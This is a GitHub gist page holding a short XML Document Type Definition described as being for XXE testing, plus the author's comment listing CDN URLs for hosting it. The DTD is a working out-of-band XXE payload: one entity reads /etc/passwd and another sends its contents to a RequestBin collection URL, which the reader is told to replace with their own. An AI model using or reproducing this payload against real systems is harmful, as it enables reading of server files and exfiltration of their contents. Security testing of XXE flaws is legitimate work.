drewsberry/xxe.dtd

Created April 11, 2017 17:45

Star 0 You must be signed in to star a gist
Fork 0 You must be signed in to fork a gist

Learn more about clone URLs
Clone this repository at <script src="https://gist.github.com/drewsberry/563a08960e88e1512f3fe9fa6a8072c1.js"></script>
Save drewsberry/563a08960e88e1512f3fe9fa6a8072c1 to your computer and use it in GitHub Desktop.

Download ZIP

XML Document Type Definition for testing for XXE (replace RequestBin URl with your own).

Raw

xxe.dtd

	<!ENTITY % data SYSTEM "file:///etc/passwd">
	<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'https://requestb.in/1fjht231?%data;'>">

Author

drewsberry commented Apr 11, 2017

Development CDN URL: https://rawgit.com/drewsberry/563a08960e88e1512f3fe9fa6a8072c1/raw/2f0bffdcdffd8b785caab9747234acbb2223b5ab/xxe.dtd

Production CDN URL:
https://cdn.rawgit.com/drewsberry/563a08960e88e1512f3fe9fa6a8072c1/raw/2f0bffdcdffd8b785caab9747234acbb2223b5ab/xxe.dtd

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment